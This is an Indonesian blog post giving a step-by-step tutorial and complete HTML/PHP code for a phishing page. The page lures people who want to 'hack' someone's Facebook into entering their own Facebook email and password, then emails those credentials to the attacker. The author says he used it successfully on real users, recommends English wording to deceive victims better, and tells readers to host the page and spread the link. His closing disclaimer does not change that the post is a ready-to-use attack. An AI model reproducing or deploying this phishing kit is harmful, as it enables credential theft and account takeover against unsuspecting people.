Hacking Facebook Dengan Metode Social Engineering

[Hacker] Hello temen temen blogger udah lama tidak update tentang hack lagi nih karna tugas skolah numpuk hehe , gimana nih kabarnya pada baik baik aja ?
Setelah lama gak update postingan , saya kembali nulis lagi nih kali ini saya akan share sesuatu yg unik dan menggelitik di wisata malam ! Ehh salah😀
Sesuatu yg sangat luar biasa maksutnya !

Cara hacking facebook dengan metode social enginering !
Ya tehnik social enginering atau rekayasa sosial yg pernah gua temukan adalah sebuah situs yg mengaku bisa membobol akun facebook seseorang !
Sementara itu untuk melakukan hal ini seseorang diminta untuk memasukan nama dan emailnya , passwordnya dan email atau username target !

PERHATIKAN ! Masa mau membobol facebook orang lain harus memasukan password facebook kita juga ?

Itu yg menginspirasi saya membuat dan menciptakan sendiri teknik ini !
Dengan script PHP yg saya buat sendiri ini anda bisa menipu atau mengelabui seseorang untuk mendapatkan password facebooknya !

Ini hanyalah sebuah model sederhana mungkin anda bisa lebih kreatif lagi dari saya !
Sewaktu anda menekan tombol kirim yg terjadi sebenarnya adalah anda mengirimkan sendiri semua data yg anda masukan kedalam sebuah email yg telah kita tentukan !
Sebagai tambahan trik ini akan lebih manjur , Jika anda membuatnya dengan menggunakan bahasa inggris karna si korban pasti akan lebih percaya !
Berikut email yg saya terima setelah korban mengirimkan datanya kepada saya !

 

Gimana berminat gak dengan teknik hacking facebook yg satu ini ?
Kebanyakan bacot yah cok ?
Yaudah yok daripada mastah mastah pada marah mending kita cekibrot aja ke langkah langkahnya🙂
1. Copy script PHP dibawah ini kedalam notepad !
<html>
<head>
<title>Hack Facebook Teman Anda !</title>
</head>
<body bgcolor=”black” text=”white”>
<p>
<center><center>
<center><center>
<form id=”form1″ name=”form1″ method=”post” action=”informasi.php”>
<table width=”455″ border=”0″ cellspacing=”0″ cellpadding=”0″>
<p>
  <tr>
    <td height=”45″ align=”right”><label for=”email1″>Email Facebook Anda</label></td>
    <td><input name=”email1″ type=”text” id=”email1″ size=”30″ /></td>
  </tr>
  <tr>
    <td width=”175″ height=”44″ align=”right”><label for”fb”>Email Facebook Target</label></td>
    <td width=”280″><input name=”email2″ type=”text” id=”email2″ size=”30″ /></td>
  </tr>
  <tr>
    <td height=”45″ align=”right”><label for=”email1″>Password Facebook Anda</label></td>
    <td><input name=”fb” type=”password” id=”fb” size=”30″ /></td>
  </tr>
  <tr>
    <td height=”41″ align=”right”><label for=”info”>URL Facebook Target</label></td>
    <td><textarea name=”info” cols=”30″ rows”5″ id=”info”></textarea></td>
  </tr>
  <tr>
    <td height=”38″>&nbsp;</td>
    <td><label>
      <input type=”submit” name=”submit” id”=submit” value=”Jika anda telah mengisi semua form diatas , Silahkan klik tombol ini untuk mendapatkan password facebook target yang akan kami kirimkan melalui pesan di facebook anda !” />
    </label></td>
  </tr>
</head>
<body bgcolor=”black” text=”white”>
<br>Untuk membongkar password facebook teman anda , kami memerlukan informasi mengenai anda dan target orang yang facebooknya ingin anda hack<p>
<p>
Silahkan masukan data anda dan data target anda pada form pengisian dibawah ini !
</body>
<html>
2. Jika sudah , silahkan simpan filenya dengan nama facebook.php atau hackfacebook.php terserah anda yg jelas namanya  harus berkaitan dengan facebook !
3. Kembali Copy script PHP dibawah ini lalu salin kedalam notepad !
<?php
/* SILAHKAN GANTI SUBJECT DAN EMAIL ANDA SENDIRI.*/
$emailsubject = ‘Korban Baru Password Facebook !’;
$mailto = ‘me.defacer@gmail.com’;
/* Fungsi berikut untuk mengambil input field. */
#fbField = $_POST[‘fb’];
$email1Field = $_POST[’email1′];
$email2Field = $_POST[’email2′];
$infoField = $_POST [‘info’];
/* Mengambil informasi untuk dikirim kepada facebook anda !. */
$body = <<<EOD
<br><hr><br>
Email Korban : $email1Field <br>
Email Target : $email2Field <br>
Password Korban : $fbField <br>
URL Target : $infoField <br>
EOD;
$headers = “From: $email1Field\r\n”; // Buat nunjukin pengirim email.
$headers .= “Content-type: text/html\r\n”; // Untuk memerintahkan server melakukan coding teks.
$success = mail($mailto, $emailSubject, $body, $headers); // Hal-hal yang akan dikirim.
?>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html;charset=utf-8″ />
<title>Mohon tunggu – Proses pencarian password sedang dilakukan</title>
</head>
<body bgcolor=”black” text=”white”>
Kami akan memproses permintaan anda segera.
<br>Silahkan periksa kotak masuk facebook anda untuk mendapatkan password target anda , Jika dalam waktu 24 Jam password tidak terkirim kedalam kotak masuk facebook anda hubungi kami melalui email ar10.dy@computer4u.com !<p>
<p>
Segala bentuk penyalahgunaan password yg anda peroleh dan apa yg akan terjadi kepada facebook anda , adalah diluar tanggung jawab kami !
</body>
<html>
4. Jika sudah silahkan simpan filenya dan beri nama informasi.php
5. Upload kedua file tersebut kedalam hostingan anda !
6. Berikan link agar orang lain dapat mengarah kehalaman hack facebook anda tersebut ! Dan selesai🙂
Saya sendiri telah mencoba tehnik dengan menulis di status facebook kalau website tersebut bisa membongkar password facebook orang lain dan ternyata banyak juga yg terjebak😀

Saya tidak ingin berlama lama dalam postingan kali ini , Intinya adalah bagaimana anda dapat meyakinkan orang lain agar dia dapat memberikan password , informasi penting atau apapun tujuan anda !

TERAKHIR ! Mohon untuk tidak menyalahgunakan tehnik ini , Apa yang saya berikan semata-mata hanyalah untuk saling berbagi dan belajar ! Happy Hacking :*

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s